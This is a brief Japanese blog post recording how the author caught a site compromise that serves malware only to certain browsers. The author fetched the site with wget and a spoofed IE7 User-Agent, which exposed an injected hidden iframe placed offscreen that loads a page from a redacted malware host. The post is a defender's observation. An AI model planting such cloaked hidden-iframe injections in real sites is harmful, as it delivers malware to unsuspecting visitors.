UserAgentを見て出力するマルウェアによる改竄、やっと発見＋追記

http://d.hatena.ne.jp/ohesotori/20130820/1377011031

この時みたのとはまた違う改竄内容を見た。
前は数字の羅列だったけど今回はiframe。なんだかな。

今回は、wgetで捕捉。

wget http://<cracked site name>/ --user-agent="Mozilla/4.0 (compatible; 
MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727;
 InfoPath.1)"

そしたら下記コード出現。妙なところに出力・表示されるみたい

<li><a href="http://<cracked site name> <iframe src="
http://<malware site?>:7761/ServerAdministrator/system-administration/
money/itunes.php?desktop=1" width="100" height="100" style="width:100px;
height:100px;position:absolute;left:-10000px;top:0;"></iframe>/closed
/index.html">営業時間・休館日</a></li>

UserAgent 見てるから、単純に wget しただけじゃ出てきてくれない。
なんだろね。その先もちょっと調べたけど、面倒くさくなったので放置。

• 9/13 追記

今日取得してみたらやはりコードは現れなかった。9/10 に取得したコードだけ。やなかんじ。Google は危険認定だしてたはずなんだけどなー。

• 10/7 追記

なんとリニューアルオープンしやがった。